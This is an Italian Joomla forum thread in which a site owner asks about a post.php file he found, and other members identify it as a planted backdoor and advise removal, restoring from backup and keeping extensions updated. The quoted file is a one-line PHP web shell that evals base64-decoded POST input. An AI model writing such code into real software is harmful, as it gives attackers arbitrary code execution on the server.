é corretto avere questo file in joomla? post.php

[bevip]

Ragazzi è corretto avere questo file in joomla 15.5.15- Public_html\includes\post.php con il seguente codice?

<?php
eval (base64_decode($_POST["php"]));
?>

[alexred]

ciao bevip,
no, non è un file di Joomla.

Consiglio di eliminarlo.

[bevip]

Grazie
Sarà fatto

[mmleoni]

ciao bevip,
  quel file ha tutto l'aspetto di essere il risultato di un hack del sito: serve a mandare in esecuzione un codice inviato per mezzo di una semplice form html.

oltre a rimuoverlo verifica anche tutti gli altri files, forse ti converrebbe ricaricare tutti i files, o ripristinare l'installazione da un back up.

ciao,
marco

[bevip]

Purtroppo e dico purtroppo, anche i backup eseguiti precedentemente sono infetti, nonostante siano stati eseguiti con il sito perfettamente funzionante. Da questo credo si possa dedurre che prima hanno disseminato codice eval() a spaglio tipo in Define.php, indexp.php. ecc.ecc e di tanto in tanto lanciano un robottino che trovando questo codice e cliccando su una ricerca eseguita da google o yahoo ti deviano su un fantomatico sito che nulla a che fare con te. Assomiglia tantissimo come tipologia di attacco a quello eseguito sui siti wordpress 2.7.1. Trovo comunque inquietante che visto il ripetersi di questo problema si sia sempre e solo parlato del ripristino e non della falla. Ciao e grazie.

[mau_develop]

Trovo comunque inquietante che visto il ripetersi di questo problema si sia sempre e solo parlato del ripristino e non della falla.
---------------------------------------------------------------------
perchè non c'è una falla,o meglio, se hai il core e tutti gli addons all'ultima versione disponibile questo non accade.
Che senso avrebbe spiegare una falla quando già esiste la patch?

M.

[mmleoni]

non è così semplice spiegare ove sia la falla, sicuramente maurizio ha ragione, se non hai fatto gli aggiornamenti è facile che la falla sia in uno dei componenti installati o in joomla.

btw: avete notato che tutti aggiornano joomla, ma quasi nessuno si preoccupa delle varie estensioni?

in altri casi la causa potrebbe anche essere esogena: un paio di mesi fa un sito di un collaboratore, che era stato preparato da me, è stato spianato perché il vicino di directory non aveva mai effettuato aggiornamenti ed il provider aveva configurato il server alla...

potrebbe poi essere un hack dovuto a programmi propri del server...

come vedi le cause possono essere così tante che è impossibile determinare quella esatta senza accedere al server.

ciao,
marco

[bevip]

Ragazzi, capisco che non sia una cosa facile, ed a grandi linee il dubbio è: mi trascino questo problema almeno da gennaio? quando ancora avevo la ver. 15.14 di Joomla?.
o quando ancora non era uscito l'aggiornamento di Ozio G.?
la risposta è senzaltro "si" si ma chi?.
Una cosa però funziona bene: questo forum... :)trovo competenza e velocità nelle risposte. ciao. mi auguro di non rompervi più con questa storia altrimenti, hai mè, Significherebbe rifare completamente tutto il sito.